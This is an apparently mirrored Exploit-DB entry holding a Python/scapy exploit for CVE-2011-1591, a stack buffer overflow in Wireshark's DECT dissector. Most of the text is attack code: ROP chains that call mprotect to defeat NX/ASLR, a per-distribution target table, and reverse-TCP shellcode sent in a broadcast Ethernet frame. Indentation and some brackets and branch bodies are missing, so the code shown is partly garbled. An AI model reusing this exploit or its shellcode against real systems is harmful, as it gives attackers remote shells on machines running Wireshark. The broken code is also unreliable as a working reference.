Wireshark 1.4.4 – DECT Dissector Remote Buffer Overflow

  • 作者: ipv
    日期: 2011-11-22
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/18145/
  • #!/usr/bin/env python
    # -*- coding: iso-8859-15 -*-
    a = """
    \n\t-- CVE: 2011-1591 : Wireshark <= 1.4.4 packet-dect.c dissect_dect() --\n
    # -------- Team : Consortium-of-Pwners
    # -------- Author : ipv
    # -------- Impact : high
    # -------- Target : Archlinux wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
    # -------- Description
    # This code exploits a remote stack based buffer overflow in the DECT dissector of
    # wireshark. ROP chains aims to recover dynamically stack address, mprotect it and stack pivot to 
    # shellcode located the payload. 
    # All the process is automated, and bypass any NX/ALSR.
    # Operating Systems tested : [see the summary] with scapy >= 2.5
    # For any comments, remarks, news, please mail me : ipv _at_ [team] . net
    import sys, struct
    if sys.version_info >= (2, 5):
     from scapy.all import *
     from scapy import *
    # align
    def _x(v):
    return struct.pack("<I", v)
    # Gadget Table - Arch linux v2010.05 default package 
    # - wireshark-cli-1.4.3-1-i686.pkg.tar.xz
    # - wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
    arch_rop_chain= [
    # Safe SEIP overwrite
    _x(0x8069acb),# pop ebx ; pop esi ; pop ebp
    _x(0), _x(0x80e9360), _x(0),# fake (arg1, arg2, arg3), to avoid crash
    # mprotect 1st arg : stack & 0xffff0000
    _x(0x8067d90),# push esp ; pop ebp
    _x(0x8081f2e),# xchg ebp eax
    _x(0x80f9d7f),# xchg ecx, eax
    _x(0x8061804),# pop eax
    _x(0xffff0000), # 
    _x(0x80c69f0),# xchg edi, eax
    _x(0x80ff067),# and ecx edi ; dec ecx
    _x(0x8077c53),# inc ecx ; sub al 0x5d 
    _x(0x8061804),# pop eax
    _x(0x7f16a5d0), # avoid crash with dec dword [ecx-0x76fbdb8c] 
    _x(0x8048360),# xchg ecx eax 
    _x(0x8089f46),# xchg edx eax ; std ; dec dword [ecx-0x76fbdb8c] 
    _x(0x8067d90),# push esp ; pop ebp
    _x(0x8081f2e),# xchg ebp eax
    _x(0x8067d92)*7,# ret
    # 1st arg of mprotect is on esp+48 address (see below)
    _x(0x80745f9),# mov [eax+0x50] edx ; pop ebp
    # we search address of mprotect (@mprotect = @fopen + 0x6fe70) 
    _x(0x8065226),# pop eax 
    _x(0x81aca20-0xc),# got[fopen]
    _x(0x8074597),# mov eax [eax+0xc] 
    _x(0x8048360),# xchg ecx eax 
    _x(0x8065226),# pop eax 
    _x(0x8081f2e),# xchg ebp eax
    _x(0x806973d),# add ecx ebp 
    _x(0x08104f61), # jmp *%ecx
    _x(0x0811eb63), # pop ebx, pop esi, pop edi
    # mprotect args (base_addr, page size, mode)
    _x(0),# Stack Map that is updated dynamically (see upper)
    _x(0x10000),# PAGE size 0x1000 
    _x(0x7),# RWX Mode
    # now we can jump to our lower addressed shellcode by decreasing esp register 
    _x(0x8061804),# pop eax 
    _x(0xff+0x50),# esp will be decreased of 0xff + 0x50 bytes;
    _x(0x80b8fc8),# xchg edi eax 
    _x(0x8067d90),# push esp ; pop ebp
    _x(0x80acc63),# sub ebp, edi ; dec ecx
    _x(0x8081f2e),# xchg ebp eax
    _x(0x0806979e)# jmp *eax
    # Gadget Table - Bt4 compiled without SSP/FortifySource
    # Source wireshark 1.4.3
    labs_rop_chain = [
    # Safe SEIP overwrite
    _x(0x08073fa1), # popebx;popesi;popebp
    _x(0), _x(0x0808c4d3), _x(0), # fake (arg1, arg2, arg3), to avoid crash
    # sys_mprotect : eax=125(0x7D) ; ebx=address base ; ecx = size page ; edx = mode
    # mprotect 3r d arg
    _x(0x080e64cf), # pop edx ; pop es ; add cl cl
    _x(0x7), _x(0x0), # RWX mode 0x7
    # mprotect 1st arg (logical AND with stack address to get address base),
    _x(0x080a1711), # mov edi esp ; dec ecx 
    _x(0x0815b74f), # pop ecx 
    _x(0xffff0000), # 
    _x(0x0804c73c), # xchg ecx eax 
    _x(0x080fadd7), # and edi eax ; dec ecx
    _x(0x0804c73c), # xchg ecx eax 
    _x(0x080af344), # mov ebx edi ; dec ecx 
    # mprotect 2nd arg
    _x(0x0815b74f), # pop ecx
    _x(0x10000),# PAGE size 0x10000
    # int 0x80 : here vdso is not randomized, so, we use it!
    _x(0x80d8b71),# pop eax 
    _x(0x7D), # 0x7D = mprotect syscall
    _x(0x804e6df),# pop *esi
    _x(0xffffe411), # int 0x80 
    # _x(0xffffe414), # @sysenter in .vdso
    _x(0x080ab949), # jmp *esi
    # now we can jump to our lower addressed shellcode by decreasing esp register 
    _x(0x0815b74f), # pop ecx 
    _x(256),# esp will be decreased of 256bytes
    _x(0x080a1711), # mov edi esp ; dec ecx 
    _x(0x081087d3), # sub edi ecx ; dec ecx 
    _x(0x080f7cb1)# jmp *edi
    addr_os = {
    1: ["Arch Linux 2010.05",0xb9, arch_rop_chain], # wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
    2: ["Labs test ",0xbf, labs_rop_chain],
    	-1 : ["Debian 5.0.8 Lenny",-3, False],			# wireshark_1.0.2-3+lenny12_i386.deb
    -2 : ["Debian 6.0.2 Squeeze",-1, False],			# wireshark_1.2.11-6+squeeze1_i386.deb	
    -3 : ["Fedora 14 ",-1, False],			# wireshark-1.4.3-1.2.2.i586.rpm
    -4 : ["OpenSuse 11.3 ",-1, False],			# wireshark-1.4.3-1.2.2.i586.rpm
    -5 : ["Ubuntu 10.10 | 11.04",-1, False],			# 
    -6 : ["Gentoo *",-2, False]			# 
    print a
    def usage():
    print "Please select and ID >= 0 :\n"
    print " IDTARGETINFO"
    print "--------------------------------------------------------------------"
    for i in addr_os.iteritems():
    print "%2d-- %s "%(i[0], i[1][0]), 
    if i[1][1] == -1:
    print "Default package uses LibSSP & Fortify Source"
    elif i[1][1] == -2:
    print "Compiled/Build with Fortify Source"
    elif i[1][1] == -3:
    print "DECT protocol not supported"
    print "VULN -> Stack size %d"%(i[1][1])
    if len(sys.argv) == 1:
    elif addr_os.has_key(int(sys.argv[1])) is False:
    elif int(sys.argv[1]) < 0:
    target = addr_os[int(sys.argv[1])]
    print "\n[+] Target : %s"%target[0]
    rop_chain = "".join([ rop for rop in target[2]])
    # msfpayload linux/x86/shell_reverse_tcp LHOST= C
    rev_tcp_shell = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x7f\x00\x00\x01\x66\x68\x11\x5c\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
    SEIP_SMASH = target[1]
    print "\t[+] Length for smashing SEIP : 0x%x(%d)"%(SEIP_SMASH, SEIP_SMASH)
    nopsled = "\x90"
    head_nop = 50
    shellcode = nopsled * head_nop + rev_tcp_shell + nopsled * (SEIP_SMASH-len(rev_tcp_shell) - head_nop)
    payload = shellcode + rop_chain
    # stack alignment
    if (len(payload) % 2):
    diff = len(payload) % 2
    payload = payload[(2-diff):]
    print "\t[+] Payload length : %d"%len(payload)
    evil_packet = Ether(type=0x2323, dst="ff:ff:ff:ff:ff:ff") / payload
    # evil_packet.show()
    print "\t[+] Evil packet length : %d"%len(evil_packet)
    print "\t[+] Sending packet to broadcast"